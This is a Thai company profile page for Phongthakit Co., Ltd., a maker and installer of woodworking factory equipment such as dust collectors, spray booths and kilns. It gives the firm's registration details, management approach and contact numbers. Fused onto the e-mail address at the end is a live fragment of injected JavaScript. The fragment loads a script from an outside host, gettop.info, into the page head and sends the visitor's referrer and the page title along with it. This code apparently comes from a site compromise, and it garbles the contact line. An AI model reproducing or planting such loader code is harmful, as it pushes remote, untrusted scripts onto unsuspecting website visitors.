ประวัติความเป็นมา

บริษัท พงษ์ฐกิตติ์ จำกัด ได้จดทะเบียนเป็นนิติบุคคลประเภท บริษัท จำกัด เมื่อวันที่ 22 มกราคม 2551 ทะเบียนเลขที่ 0735551000200 ทุนจดทะเบียน 1 ล้านบาท สำนักงานตั้งอยู่เลขที่ 86/6 หมู่ 2 ตำบล ลำพยา อำเภอเมือง จังหวัดนครปฐม 73000

บริษัท พงษ์ฐกิตติ์ จำกัด ประกอบกิจการประเภทผลิตเพื่อจำหน่ายและให้บริการติดตั้งเครื่องจักรที่ใช้ในโรงงานอุตสาหกรรมประเภทงานไม้ เช่น ระบบดูดฝุ่นไม้ของโรงงานผลิตเฟอร์นิเจอร์ ,ไซโคลน , ระบบแยกฝุ่นไม้ , ห้องเก็บฝุ่นไม้ , ระบบพ่นสีไม้ , ระบบอบสีไม้ , เตาอบไม้ , เครื่องกำเนิดไอน้ำ , ถังอัดน้ำยาไม้ , ระบบลำเลียงสายพาน PVC ระบบลำเลียงสายพานตะแกรงโซ่ เป็นต้น

ทางบริษัทฯ มีพนักงานรวมกันกว่า 30 คน จุดแข็งและคุณภาพอยู่ที่การบริหารงานของกรรมการผู้จัดการที่มีประสบการณ์ในงานด้านนี้กว่า 25 ปีเต็ม และบวกกับหัวหน้างานที่มีความชำนาญและประสบการณ์มากเช่นกัน จึงทำให้มีการพัฒนาผลิตภัณฑ์ทั้งด้านคุณภาพและตรงตามมาตรฐานที่ลูกค้ากำหนดให้ เพื่อตอบสนองความต้องการและสร้างความมั่นใจให้ลูกค้า และเพื่อรองรับการขยายตัวของบริษัทฯในอนาคต

บริษัทฯ ตระหนักถึงความสำคัญในเรื่องบุคลากร ซึ่งเรามีความเชื่อมั่นว่าบุคลากรจะเป็นปัจจัยสำคัญอันจะนำพาองค์กรให้เติบโต ดังนั้นจึงคัดสรรบุคลากรที่มีความสามารถตามสายงาน เพื่อสร้างความแข็งแรงให้เกิดขึ้นภายในองค์กร เน้นการกำหนดบทบาทหน้าที่ ขอบเขต ความรับผิดชอบ เพื่อกระจายงานและแบ่งสายการบริหารลงสู่ระดับล่างโดยมีหัวหน้าช่างเป็นผู้ดูแลและวางแนวทางเมื่อเกิดปัญหาขึ้น โดยถือเป็นผลประโยชน์ของบริษัทฯ เป็นสิ่งสำคัญภายในหน่วยงานแต่ละส่วนมีการจัดสรรและแบ่งแยกหน้าที่ของแต่ละฝ่าย โดยให้ถือนโยบายของบริษัท อีกทั้งปลูกฝังจิตสำนึกที่ดีมีความรับผิดชอบในการทำงานเป็นทีม เป็นหมู่คณะ การประสานงานที่ถูกต้องตลอดจนการปฏิบัติตาม กฎเกณฑ์ ระเบียบ ข้อบังคับต่างๆ ถือว่าปกครองกันแบบพี่น้องเป็นครอบครัวทั้งนี้เพื่อความสะดวกในการดูแลควบคุมกลไกขององค์กรให้บรรลุผลตามแผนที่ได้วางไว้โดยมุ่งเน้นการพัฒนาศักยภาพ และการปรับปรุงอย่างต่อเนื่อง

โทร. 034- 272232 , 034-271863 , 089-2007057
088-6273215 , 088-6273216, 081-4329692
Fax. (034) 272232
www.phongthakit.com E-mail : phongthakit@yahoo.co.ths.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);topspyapps.net